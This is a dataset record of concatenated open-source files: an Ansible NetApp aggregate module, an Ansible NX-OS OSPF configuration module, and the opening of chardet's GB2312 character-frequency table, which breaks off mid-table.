disk_count: 1
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Manage Aggregates
na_cdot_aggregate:
state: present
name: ansibleAggr
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppCDOTAggregate(object):
    """Idempotently create or destroy a NetApp cDOT aggregate via ZAPI.

    Module parameters are parsed in ``__init__``; ``apply`` converges the
    device to the requested state and exits the Ansible module.
    """

    def __init__(self):
        self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
        self.argument_spec.update(dict(
            state=dict(required=True, choices=['present', 'absent']),
            name=dict(required=True, type='str'),
            disk_count=dict(required=False, type='int'),
        ))

        self.module = AnsibleModule(
            argument_spec=self.argument_spec,
            required_if=[
                # disk_count is only meaningful when creating an aggregate.
                ('state', 'present', ['disk_count'])
            ],
            supports_check_mode=True
        )

        p = self.module.params

        # set up state variables
        self.state = p['state']
        self.name = p['name']
        self.disk_count = p['disk_count']

        if not HAS_NETAPP_LIB:
            self.module.fail_json(msg="the python NetApp-Lib module is required")
        else:
            self.server = netapp_utils.setup_ontap_zapi(module=self.module)

    def get_aggr(self):
        """
        Checks if aggregate exists.

        :return:
            True if aggregate found
            False if aggregate is not found
        :rtype: bool
        """
        aggr_get_iter = netapp_utils.zapi.NaElement('aggr-get-iter')
        query_details = netapp_utils.zapi.NaElement.create_node_with_children(
            'aggr-attributes', **{'aggregate-name': self.name})

        query = netapp_utils.zapi.NaElement('query')
        query.add_child_elem(query_details)
        aggr_get_iter.add_child_elem(query)

        try:
            result = self.server.invoke_successfully(aggr_get_iter,
                                                     enable_tunneling=False)
        except netapp_utils.zapi.NaApiError as e:
            # Error 13040 denotes an aggregate not being found.
            if to_native(e.code) == "13040":
                return False
            else:
                self.module.fail_json(msg=to_native(e),
                                      exception=traceback.format_exc())

        return bool(result.get_child_by_name('num-records') and
                    int(result.get_child_content('num-records')) >= 1)

    def create_aggr(self):
        """Create the aggregate with ``self.disk_count`` disks."""
        aggr_create = netapp_utils.zapi.NaElement.create_node_with_children(
            'aggr-create', **{'aggregate': self.name,
                              'disk-count': str(self.disk_count)})

        try:
            self.server.invoke_successfully(aggr_create,
                                            enable_tunneling=False)
        except netapp_utils.zapi.NaApiError as e:
            self.module.fail_json(msg="Error provisioning aggregate %s: %s" % (self.name, to_native(e)),
                                  exception=traceback.format_exc())

    def delete_aggr(self):
        """Destroy the aggregate named ``self.name``."""
        aggr_destroy = netapp_utils.zapi.NaElement.create_node_with_children(
            'aggr-destroy', **{'aggregate': self.name})

        try:
            self.server.invoke_successfully(aggr_destroy,
                                            enable_tunneling=False)
        except netapp_utils.zapi.NaApiError as e:
            self.module.fail_json(msg="Error removing aggregate %s: %s" % (self.name, to_native(e)),
                                  exception=traceback.format_exc())

    def rename_aggregate(self):
        """Rename the aggregate.

        NOTE(review): as written this renames the aggregate to its current
        name (the module takes no "from name" parameter), so it is
        effectively a no-op.  Kept for interface compatibility.
        """
        aggr_rename = netapp_utils.zapi.NaElement.create_node_with_children(
            'aggr-rename', **{'aggregate': self.name,
                              'new-aggregate-name': self.name})

        try:
            self.server.invoke_successfully(aggr_rename,
                                            enable_tunneling=False)
        except netapp_utils.zapi.NaApiError as e:
            self.module.fail_json(msg="Error renaming aggregate %s: %s" % (self.name, to_native(e)),
                                  exception=traceback.format_exc())

    def apply(self):
        """Converge the aggregate to the requested state and exit."""
        changed = False
        aggregate_exists = self.get_aggr()

        # Fixed: the original compared ``self.name`` against itself to decide
        # whether to rename, which could never be true; that dead rename
        # branch has been removed (a rename would need a "from" parameter).
        if aggregate_exists:
            if self.state == 'absent':
                changed = True
        else:
            if self.state == 'present':
                # Aggregate does not exist, but requested state is present.
                changed = True

        if changed and not self.module.check_mode:
            if self.state == 'present':
                if not aggregate_exists:
                    self.create_aggr()
            elif self.state == 'absent':
                self.delete_aggr()

        self.module.exit_json(changed=changed)
def main():
    """Module entry point: build the worker object and apply the state."""
    aggregate = NetAppCDOTAggregate()
    aggregate.apply()


if __name__ == '__main__':
    main()
| gpl-3.0 |
abadger/ansible-modules-core | network/nxos/nxos_ospf.py | 21 | 9659 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: nxos_ospf
version_added: "2.2"
short_description: Manages configuration of an ospf instance.
description:
- Manages configuration of an ospf instance.
author: Gabriele Gerbino (@GGabriele)
extends_documentation_fragment: nxos
options:
ospf:
description:
- Name of the ospf instance.
required: true
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- nxos_ospf:
ospf: 1
state: present
username: "{{ un }}"
password: "{{ pwd }}"
host: "{{ inventory_hostname }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"ospf": "1"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"ospf": ["2"]}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"ospf": ["1", "2"]}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["router ospf 1"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
# COMMON CODE FOR MIGRATION
import re
import ansible.module_utils.nxos
from ansible.module_utils.basic import get_exception
from ansible.module_utils.netcfg import NetworkConfig, ConfigLine
from ansible.module_utils.network import NetworkModule
from ansible.module_utils.shell import ShellError
def to_list(val):
    """Return `val` as a list: copy sequences, wrap scalars, [] for None."""
    if val is None:
        return []

    if isinstance(val, (list, tuple)):
        return list(val)

    return [val]
class CustomNetworkConfig(NetworkConfig):
    """NetworkConfig with helpers for looking up and expanding config sections."""

    def expand_section(self, configobj, S=None):
        """Return ``configobj`` plus all of its descendants as a flat list.

        ``S`` accumulates results across the recursion; objects already in
        ``S`` are skipped.
        """
        if S is None:
            S = list()
        S.append(configobj)
        for child in configobj.children:
            if child in S:
                continue
            self.expand_section(child, S)
        return S

    def get_object(self, path):
        """Return the item whose text is ``path[-1]`` under parents ``path[:-1]``.

        Returns None when no item matches.
        """
        for item in self.items:
            if item.text == path[-1]:
                parents = [p.text for p in item.parents]
                if parents == path[:-1]:
                    return item

    def to_block(self, section):
        """Join the raw lines of ``section`` into a single newline-joined block."""
        return '\n'.join([item.raw for item in section])

    def get_section(self, path):
        """Return the section at ``path`` as text, or an empty list if absent."""
        try:
            section = self.get_section_objects(path)
            return self.to_block(section)
        except ValueError:
            return list()

    def get_section_objects(self, path):
        """Return the config objects making up the section at ``path``.

        :raises ValueError: if ``path`` does not exist in the config.
        """
        if not isinstance(path, list):
            path = [path]
        obj = self.get_object(path)
        if not obj:
            raise ValueError('path does not exist in config')
        return self.expand_section(obj)

    def add(self, lines, parents=None):
        """Add one or more lines of configuration, optionally under ``parents``.

        Missing parent lines are created (indented by ``self.indent`` per
        nesting level); lines already present are not duplicated.
        """
        ancestors = list()
        offset = 0
        obj = None

        ## global config command
        if not parents:
            for line in to_list(lines):
                item = ConfigLine(line)
                item.raw = line
                if item not in self.items:
                    self.items.append(item)

        else:
            # Walk/create the parent chain one level at a time.
            for index, p in enumerate(parents):
                try:
                    i = index + 1
                    obj = self.get_section_objects(parents[:i])[0]
                    ancestors.append(obj)

                except ValueError:
                    # add parent to config
                    offset = index * self.indent
                    obj = ConfigLine(p)
                    obj.raw = p.rjust(len(p) + offset)
                    if ancestors:
                        obj.parents = list(ancestors)
                        ancestors[-1].children.append(obj)
                    self.items.append(obj)
                    ancestors.append(obj)

            # add child objects
            for line in to_list(lines):
                # check if child already exists
                for child in ancestors[-1].children:
                    if child.text == line:
                        break
                else:
                    # Not present: append indented under the deepest parent.
                    offset = len(parents) * self.indent
                    item = ConfigLine(line)
                    item.raw = line.rjust(len(line) + offset)
                    item.parents = ancestors
                    ancestors[-1].children.append(item)
                    self.items.append(item)
def get_network_module(**kwargs):
    """Return a network module object.

    Prefers the legacy ``get_module`` factory when that name is defined
    (older Ansible releases); falls back to ``NetworkModule`` when it is
    not (the call raises NameError).
    """
    try:
        return get_module(**kwargs)
    except NameError:
        return NetworkModule(**kwargs)
def get_config(module, include_defaults=False):
    """Return the device configuration wrapped in a CustomNetworkConfig.

    Uses the config supplied via the module's ``config`` parameter when
    present; otherwise fetches the configuration from the device, falling
    back to the newer ``module.config`` connection object when the legacy
    ``get_config`` method is absent.
    """
    contents = module.params['config']

    if not contents:
        try:
            contents = module.get_config()
        except AttributeError:
            contents = module.config.get_config(
                include_defaults=module.params['include_defaults'])

    return CustomNetworkConfig(indent=2, contents=contents)
def load_config(module, candidate):
    """Push the difference between `candidate` and the running config.

    :param module: The network module (provides device access and params).
    :param candidate: A config object whose delta against the device's
        current config is computed and applied.
    :returns: dict with ``changed`` and, when commands were sent,
        ``updates`` (the list of command strings).
    """
    config = get_config(module)
    commands = candidate.difference(config)
    commands = [str(c).strip() for c in commands]

    save_config = module.params['save']

    result = dict(changed=False)

    if commands:
        # In check mode the commands are reported but not sent.
        if not module.check_mode:
            try:
                module.configure(commands)
            except AttributeError:
                # Newer connection objects expose config via module.config.
                module.config(commands)

            if save_config:
                try:
                    module.config.save_config()
                except AttributeError:
                    module.execute(['copy running-config startup-config'])

        result['changed'] = True
        result['updates'] = commands

    return result
# END OF COMMON CODE
# Maps module parameter names to the NX-OS command fragments they configure.
PARAM_TO_COMMAND_KEYMAP = {
    'ospf': 'router ospf'
}
def invoke(name, *args, **kwargs):
    """Call the module-level function named `name`, if one is defined.

    Returns the function's result, or None when no such name exists.
    """
    target = globals().get(name)

    return target(*args, **kwargs) if target else None
def get_value(config, module):
    """Extract all OSPF process tags from `config`.

    :param config: Device configuration as a single string.
    :param module: Unused; kept for interface compatibility with the other
        ``get_*`` helpers.
    :returns: List of OSPF instance tags (strings) in order of appearance.
    """
    # Raw string, compiled once — the original recompiled a non-raw pattern
    # for every line and used AttributeError for control flow.
    ospf_re = re.compile(r'^router ospf\s(?P<ospf>\S+)')
    value_list = []

    for line in config.splitlines():
        match = ospf_re.match(line)
        if match:
            value_list.append(match.group('ospf'))

    return value_list
def get_existing(module):
    """Return {'ospf': [tags]} for the device's configured OSPF instances.

    Returns an empty dict when no OSPF instance is configured.
    """
    running = str(get_config(module))
    tags = get_value(running, module)

    return {'ospf': tags} if tags else {}
def apply_key_map(key_map, table):
    """Return `table` with its keys translated through `key_map`.

    Keys without a truthy mapping in `key_map` are dropped; values
    (including falsy ones) are carried over unchanged.
    """
    # The original had an if/else whose two branches were byte-identical;
    # a single comprehension expresses the same mapping.
    return {key_map[key]: value
            for key, value in table.items()
            if key_map.get(key)}
def state_present(module, proposed, candidate):
    """Stage the top-level command that creates the proposed OSPF instance."""
    candidate.add(['router ospf {0}'.format(proposed['ospf'])], parents=[])
def state_absent(module, proposed, candidate):
    """Stage the top-level command that removes the proposed OSPF instance."""
    candidate.add(['no router ospf {0}'.format(proposed['ospf'])], parents=[])
def main():
    """Entry point: parse params, compute the delta, push it, report results."""
    argument_spec = dict(
        ospf=dict(required=True, type='str'),
        state=dict(choices=['present', 'absent'], default='present',
                       required=False),
        include_defaults=dict(default=True),
        config=dict(),
        save=dict(type='bool', default=False)
    )

    module = get_network_module(argument_spec=argument_spec,
                                supports_check_mode=True)

    state = module.params['state']
    ospf = str(module.params['ospf'])

    existing = invoke('get_existing', module)
    end_state = existing
    proposed = dict(ospf=ospf)

    # existing['ospf'] is the list of configured instance tags, if any.
    if not existing:
        existing_list = []
    else:
        existing_list = existing['ospf']

    result = {}
    # Only push config when creating, or when removing something that exists.
    if (state == 'present' or (state == 'absent' and ospf in existing_list)):
        candidate = CustomNetworkConfig(indent=3)
        # Dispatches to state_present / state_absent via module globals.
        invoke('state_%s' % state, module, proposed, candidate)

        try:
            response = load_config(module, candidate)
            result.update(response)
        except ShellError:
            exc = get_exception()
            module.fail_json(msg=str(exc))
    else:
        result['updates'] = []

    result['connected'] = module.connected
    # Verbose runs include before/after state for debugging.
    if module._verbosity > 0:
        end_state = invoke('get_existing', module)
        result['end_state'] = end_state
        result['existing'] = existing
        result['proposed'] = proposed

    module.exit_json(**result)


if __name__ == '__main__':
    main()
| gpl-3.0 |
Sorsly/subtle | google-cloud-sdk/lib/third_party/chardet/gb2312freq.py | 323 | 36001 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# GB2312 most frequently used character table
#
# Char to FreqOrder table , from hz6763
# 512 --> 0.79 -- 0.79
# 1024 --> 0.92 -- 0.13
# 2048 --> 0.98 -- 0.06
# 6768 --> 1.00 -- 0.02
#
# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79
# Random Distribution Ration = 512 / (3755 - 512) = 0.157
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR
# Threshold ratio used by the distribution analyser; derivation is in the
# frequency notes in the header comment above.
GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9
# Number of entries consulted in the GB2312CharToFreqOrder table below.
GB2312_TABLE_SIZE = 3760
GB2312CharToFreqOrder = ( \
1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,
2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,
2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,
249,4088,1746,1873,2047,1774, 581,1813, 358,1174,3590,1014,1561,4844,2245, 670,
1636,3112, 889,1286, 953, 556,2327,3060,1290,3141, 613, 185,3477,1367, 850,3820,
1715,2428,2642,2303,2732,3041,2562,2648,3566,3946,1349, 388,3098,2091,1360,3585,
152,1687,1539, 738,1559, 59,1232,2925,2267,1388,1249,1741,1679,2960, 151,1566,
1125,1352,4271, 924,4296, 385,3166,4459, 310,1245,2850, 70,3285,2729,3534,3575,
2398,3298,3466,1960,2265, 217,3647, 864,1909,2084,4401,2773,1010,3269,5152, 853,
3051,3121,1244,4251,1895, 364,1499,1540,2313,1180,3655,2268, 562, 715,2417,3061,
544, 336,3768,2380,1752,4075, 950, 280,2425,4382, 183,2759,3272, 333,4297,2155,
1688,2356,1444,1039,4540, 736,1177,3349,2443,2368,2144,2225, 565, 196,1482,3406,
927,1335,4147, 692, 878,1311,1653,3911,3622,1378,4200,1840,2969,3149,2126,1816,
2534,1546,2393,2760, 737,2494, 13, 447, 245,2747, 38,2765,2129,2589,1079, 606,
360, 471,3755,2890, 404, 848, 699,1785,1236, 370,2221,1023,3746,2074,2026,2023,
2388,1581,2119, 812,1141,3091,2536,1519, 804,2053, 406,1596,1090, 784, 548,4414,
1806,2264,2936,1100, 343,4114,5096, 622,3358, 743,3668,1510,1626,5020,3567,2513,
3195,4115,5627,2489,2991, 24,2065,2697,1087,2719, 48,1634, 315, 68, 985,2052,
198,2239,1347,1107,1439, 597,2366,2172, 871,3307, 919,2487,2790,1867, 236,2570,
1413,3794, 906,3365,3381,1701,1982,1818,1524,2924,1205, 616,2586,2072,2004, 575,
253,3099, 32,1365,1182, 197,1714,2454,1201, 554,3388,3224,2748, 756,2587, 250,
2567,1507,1517,3529,1922,2761,2337,3416,1961,1677,2452,2238,3153, 615, 911,1506,
1474,2495,1265,1906,2749,3756,3280,2161, 898,2714,1759,3450,2243,2444, 563, 26,
3286,2266,3769,3344,2707,3677, 611,1402, 531,1028,2871,4548,1375, 261,2948, 835,
1190,4134, 353, 840,2684,1900,3082,1435,2109,1207,1674, 329,1872,2781,4055,2686,
2104, 608,3318,2423,2957,2768,1108,3739,3512,3271,3985,2203,1771,3520,1418,2054,
1681,1153, 225,1627,2929, 162,2050,2511,3687,1954, 124,1859,2431,1684,3032,2894,
585,4805,3969,2869,2704,2088,2032,2095,3656,2635,4362,2209, 256, 518,2042,2105,
3777,3657, 643,2298,1148,1779, 190, 989,3544, 414, 11,2135,2063,2979,1471, 403,
3678, 126, 770,1563, 671,2499,3216,2877, 600,1179, 307,2805,4937,1268,1297,2694,
252,4032,1448,1494,1331,1394, 127,2256, 222,1647,1035,1481,3056,1915,1048, 873,
3651, 210, 33,1608,2516, 200,1520, 415, 102, 0,3389,1287, 817, 91,3299,2940,
836,1814, 549,2197,1396,1669,2987,3582,2297,2848,4528,1070, 687, 20,1819, 121,
1552,1364,1461,1968,2617,3540,2824,2083, 177, 948,4938,2291, 110,4549,2066, 648,
3359,1755,2110,2114,4642,4845,1693,3937,3308,1257,1869,2123, 208,1804,3159,2992,
2531,2549,3361,2418,1350,2347,2800,2568,1291,2036,2680, 72, 842,1990, 212,1233,
1154,1586, 75,2027,3410,4900,1823,1337,2710,2676, 728,2810,1522,3026,4995, 157,
755,1050,4022, 710, 785,1936,2194,2085,1406,2777,2400, 150,1250,4049,1206, 807,
1910, 534, 529,3309,1721,1660, 274, 39,2827, 661,2670,1578, 925,3248,3815,1094,
4278,4901,4252, 41,1150,3747,2572,2227,4501,3658,4902,3813,3357,3617,2884,2258,
887, 538,4187,3199,1294,2439,3042,2329,2343,2497,1255, 107, 543,1527, 521,3478,
3568, 194,5062, 15, 961,3870,1241,1192,2664, 66,5215,3260,2111,1295,1127,2152,
3805,4135, 901,1164,1976, 398,1278, 530,1460, 748, 904,1054,1966,1426, 53,2909,
509, 523,2279,1534, 536,1019, 239,1685, 460,2353, 673,1065,2401,3600,4298,2272,
1272,2363, 284,1753,3679,4064,1695, 81, 815,2677,2757,2731,1386, 859, 500,4221,
2190,2566, 757,1006,2519,2068,1166,1455, 337,2654,3203,1863,1682,1914,3025,1252,
1409,1366, 847, 714,2834,2038,3209, 964,2970,1901, 885,2553,1078,1756,3049, 301,
1572,3326, 688,2130,1996,2429,1805,1648,2930,3421,2750,3652,3088, 262,1158,1254,
389,1641,1812, 526,1719, 923,2073,1073,1902, 468, 489,4625,1140, 857,2375,3070,
3319,2863, 380, 116,1328,2693,1161,2244, 273,1212,1884,2769,3011,1775,1142, 461,
3066,1200,2147,2212, 790, 702,2695,4222,1601,1058, 434,2338,5153,3640, 67,2360,
4099,2502, 618,3472,1329, 416,1132, 830,2782,1807,2653,3211,3510,1662, 192,2124,
296,3979,1739,1611,3684, 23, 118, 324, 446,1239,1225, 293,2520,3814,3795,2535,
3116, 17,1074, 467,2692,2201, 387,2922, 45,1326,3055,1645,3659,2817, 958, 243,
1903,2320,1339,2825,1784,3289, 356, 576, 865,2315,2381,3377,3916,1088,3122,1713,
1655, 935, 628,4689,1034,1327, 441, 800, 720, 894,1979,2183,1528,5289,2702,1071,
4046,3572,2399,1571,3281, 79, 761,1103, 327, 134, 758,1899,1371,1615, 879, 442,
215,2605,2579, 173,2048,2485,1057,2975,3317,1097,2253,3801,4263,1403,1650,2946,
814,4968,3487,1548,2644,1567,1285, 2, 295,2636, 97, 946,3576, 832, 141,4257,
3273, 760,3821,3521,3156,2607, 949,1024,1733,1516,1803,1920,2125,2283,2665,3180,
1501,2064,3560,2171,1592, 803,3518,1416, 732,3897,4258,1363,1362,2458, 119,1427,
602,1525,2608,1605,1639,3175, 694,3064, 10, 465, 76,2000,4846,4208, 444,3781,
1619,3353,2206,1273,3796, 740,2483, 320,1723,2377,3660,2619,1359,1137,1762,1724,
2345,2842,1850,1862, 912, 821,1866, 612,2625,1735,2573,3369,1093, 844, 89, 937,
930,1424,3564,2413,2972,1004,3046,3019,2011, 711,3171,1452,4178, 428, 801,1943,
432, 445,2811, 206,4136,1472, 730, 349, 73, 397,2802,2547, 998,1637,1167, 789,
396,3217, 154,1218, 716,1120,1780,2819,4826,1931,3334,3762,2139,1215,2627, 552,
3664,3628,3232,1405,2383,3111,1356,2652,3577,3320,3101,1703, 640,1045,1370,1246,
4996, 371,1575,2436,1621,2210, 984,4033,1734,2638, 16,4529, 663,2755,3255,1451,
3917,2257,1253,1955,2234,1263,2951, 214,1229, 617, 485, 359,1831,1969, 473,2310,
750,2058, 165, 80,2864,2419, 361,4344,2416,2479,1134, 796,3726,1266,2943, 860,
2715, 938, 390,2734,1313,1384, 248, 202, 877,1064,2854, 522,3907, 279,1602, 297,
2357, 395,3740, 137,2075, 944,4089,2584,1267,3802, 62,1533,2285, 178, 176, 780,
2440, 201,3707, 590, 478,1560,4354,2117,1075, 30, 74,4643,4004,1635,1441,2745,
776,2596, 238,1077,1692,1912,2844, 605, 499,1742,3947, 241,3053, 980,1749, 936,
2640,4511,2582, 515,1543,2162,5322,2892,2993, 890,2148,1924, 665,1827,3581,1032,
968,3163, 339,1044,1896, 270, 583,1791,1720,4367,1194,3488,3669, 43,2523,1657,
163,2167, 290,1209,1622,3378, 550, 634,2508,2510, 695,2634,2384,2512,1476,1414,
220,1469,2341,2138,2852,3183,2900,4939,2865,3502,1211,3680, 854,3227,1299,2976,
3172, 186,2998,1459, 443,1067,3251,1495, 321,1932,3054, 909, 753,1410,1828, 436,
2441,1119,1587,3164,2186,1258, 227, 231,1425,1890,3200,3942, 247, 959, 725,5254,
2741, 577,2158,2079, 929, 120, 174, 838,2813, 591,1115, 417,2024, 40,3240,1536,
1037, 291,4151,2354, 632,1298,2406,2500,3535,1825,1846,3451, 205,1171, 345,4238,
18,1163, 811, 685,2208,1217, 425,1312,1508,1175,4308,2552,1033, 587,1381,3059,
2984,3482, 340,1316,4023,3972, 792,3176, 519, 777,4690, 918, 933,4130,2981,3741,
90,3360,2911,2200,5184,4550, 609,3079,2030, 272,3379,2736, 363,3881,1130,1447,
286, 779, 357,1169,3350,3137,1630,1220,2687,2391, 747,1277,3688,2618,2682,2601,
1156,3196,5290,4034,3102,1689,3596,3128, 874, 219,2783, 798, 508,1843,2461, 269,
1658,1776,1392,1913,2983,3287,2866,2159,2372, 829,4076, 46,4253,2873,1889,1894,
915,1834,1631,2181,2318, 298, 664,2818,3555,2735, 954,3228,3117, 527,3511,2173,
681,2712,3033,2247,2346,3467,1652, 155,2164,3382, 113,1994, 450, 899, 494, 994,
1237,2958,1875,2336,1926,3727, 545,1577,1550, 633,3473, 204,1305,3072,2410,1956,
2471, 707,2134, 841,2195,2196,2663,3843,1026,4940, 990,3252,4997, 368,1092, 437,
3212,3258,1933,1829, 675,2977,2893, 412, 943,3723,4644,3294,3283,2230,2373,5154,
2389,2241,2661,2323,1404,2524, 593, 787, 677,3008,1275,2059, 438,2709,2609,2240,
2269,2246,1446, 36,1568,1373,3892,1574,2301,1456,3962, 693,2276,5216,2035,1143,
2720,1919,1797,1811,2763,4137,2597,1830,1699,1488,1198,2090, 424,1694, 312,3634,
3390,4179,3335,2252,1214, 561,1059,3243,2295,2561, 975,5155,2321,2751,3772, 472,
1537,3282,3398,1047,2077,2348,2878,1323,3340,3076, 690,2906, 51, 369, 170,3541,
1060,2187,2688,3670,2541,1083,1683, 928,3918, 459, 109,4427, 599,3744,4286, 143,
2101,2730,2490, 82,1588,3036,2121, 281,1860, 477,4035,1238,2812,3020,2716,3312,
1530,2188,2055,1317, 843, 636,1808,1173,3495, 649, 181,1002, 147,3641,1159,2414,
3750,2289,2795, 813,3123,2610,1136,4368, 5,3391,4541,2174, 420, 429,1728, 754,
1228,2115,2219, 347,2223,2733, 735,1518,3003,2355,3134,1764,3948,3329,1888,2424,
1001,1234,1972,3321,3363,1672,1021,1450,1584, 226, 765, 655,2526,3404,3244,2302,
3665, 731, 594,2184, 319,1576, 621, 658,2656,4299,2099,3864,1279,2071,2598,2739,
795,3086,3699,3908,1707,2352,2402,1382,3136,2475,1465,4847,3496,3865,1085,3004,
2591,1084, 213,2287,1963,3565,2250, 822, 793,4574,3187,1772,1789,3050, 595,1484,
1959,2770,1080,2650, 456, 422,2996, 940,3322,4328,4345,3092,2742, 965,2784, 739,
4124, 952,1358,2498,2949,2565, 332,2698,2378, 660,2260,2473,4194,3856,2919, 535,
1260,2651,1208,1428,1300,1949,1303,2942, 433,2455,2450,1251,1946, 614,1269, 641,
1306,1810,2737,3078,2912, 564,2365,1419,1415,1497,4460,2367,2185,1379,3005,1307,
3218,2175,1897,3063, 682,1157,4040,4005,1712,1160,1941,1399, 394, 402,2952,1573,
1151,2986,2404, 862, 299,2033,1489,3006, 346, 171,2886,3401,1726,2932, 168,2533,
47,2507,1030,3735,1145,3370,1395,1318,1579,3609,4560,2857,4116,1457,2529,1965,
504,1036,2690,2988,2405, 745,5871, 849,2397,2056,3081, 863,2359,3857,2096, 99,
1397,1769,2300,4428,1643,3455,1978,1757,3718,1440, 35,4879,3742,1296,4228,2280,
160,5063,1599,2013, 166, 520,3479,1646,3345,3012, 490,1937,1545,1264,2182,2505,
1096,1188,1369,1436,2421,1667,2792,2460,1270,2122, 727,3167,2143, 806,1706,1012,
1800,3037, 960,2218,1882, 805, 139,2456,1139,1521, 851,1052,3093,3089, 342,2039,
744,5097,1468,1502,1585,2087, 223, 939, 326,2140,2577, 892,2481,1623,4077, 982,
3708, 135,2131, 87,2503,3114,2326,1106, 876,1616, 547,2997,2831,2093,3441,4530,
4314, 9,3256,4229,4148, 659,1462,1986,1710,2046,2913,2231,4090,4880,5255,3392,
3274,1368,3689,4645,1477, 705,3384,3635,1068,1529,2941,1458,3782,1509, 100,1656,
2548, 718,2339, 408,1590,2780,3548,1838,4117,3719,1345,3530, 717,3442,2778,3220,
2898,1892,4590,3614,3371,2043,1998,1224,3483, 891, 635, 584,2559,3355, 733,1766,
1729,1172,3789,1891,2307, 781,2982,2271,1957,1580,5773,2633,2005,4195,3097,1535,
3213,1189,1934,5693,3262, 586,3118,1324,1598, 517,1564,2217,1868,1893,4445,3728,
2703,3139,1526,1787,1992,3882,2875,1549,1199,1056,2224,1904,2711,5098,4287, 338,
1993,3129,3489,2689,1809,2815,1997, 957,1855,3898,2550,3275,3057,1105,1319, 627,
1505,1911,1883,3526, 698,3629,3456,1833,1431, 746, 77,1261,2017,2296,1977,1885,
125,1334,1600, 525,1798,1109,2222,1470,1945, 559,2236,1186,3443,2476,1929,1411,
2411,3135,1777,3372,2621,1841,1613,3229, 668,1430,1839,2643,2916, 195,1989,2671,
2358,1387, 629,3205,2293,5256,4439, 123,1310, 888,1879,4300,3021,3605,1003,1162,
3192,2910,2010, 140,2395,2859, 55,1082,2012,2901, 662, 419,2081,1438, 680,2774,
4654,3912,1620,1731,1625,5035,4065,2328, 512,1344, 802,5443,2163,2311,2537, 524,
3399, 98,1155,2103,1918,2606,3925,2816,1393,2465,1504,3773,2177,3963,1478,4346,
180,1113,4655,3461,2028,1698, 833,2696,1235,1322,1594,4408,3623,3013,3225,2040,
3022, 541,2881, 607,3632,2029,1665,1219, 639,1385,1686,1099,2803,3231,1938,3188,
2858, 427, 676,2772,1168,2025, 454,3253,2486,3556, 230,1950, 580, 791,1991,1280,
1086,1974,2034, 630, 257,3338,2788,4903,1017, 86,4790, 966,2789,1995,1696,1131,
259,3095,4188,1308, 179,1463,5257, 289,4107,1248, 42,3413,1725,2288, 896,1947,
774,4474,4254, 604,3430,4264, 392,2514,2588, 452, 237,1408,3018, 988,4531,1970,
3034,3310, 540,2370,1562,1288,2990, 502,4765,1147, 4,1853,2708, 207, 294,2814,
4078,2902,2509, 684, 34,3105,3532,2551, 644, 709,2801,2344, 573,1727,3573,3557,
2021,1081,3100,4315,2100,3681, 199,2263,1837,2385, 146,3484,1195,2776,3949, 997,
1939,3973,1008,1091,1202,1962,1847,1149,4209,5444,1076, 493, 117,5400,2521, 972,
1490,2934,1796,4542,2374,1512,2933,2657, 413,2888,1135,2762,2314,2156,1355,2369,
766,2007,2527,2170,3124,2491,2593,2632,4757,2437, 234,3125,3591,1898,1750,1376,
1942,3468,3138, 570,2127,2145,3276,4131, 962, 132,1445,4196, 19, 941,3624,3480,
3366,1973,1374,4461,3431,2629, 283,2415,2275, 808,2887,3620,2112,2563,1353,3610,
955,1089,3103,1053, 96, 88,4097, 823,3808,1583, 399, 292,4091,3313, 421,1128,
642,4006, 903,2539,1877,2082, 596, 29,4066,1790, 722,2157, 130, 995,1569, 769,
1485, 464, 513,2213, 288,1923,1101,2453,4316, 133, 486,2445, 50, 625, 487,2207,
57, 423, 481,2962, 159,3729,1558, 491, 303, 482, 501, 240,2837, 112,3648,2392,
1783, 362, 8,3433,3422, 610,2793,3277,1390,1284,1654, 21,3823, 734, 367, 623,
193, 287, 374,1009,1483, 816, 476, 313,2255,2340,1262,2150,2899,1146,2581, 782,
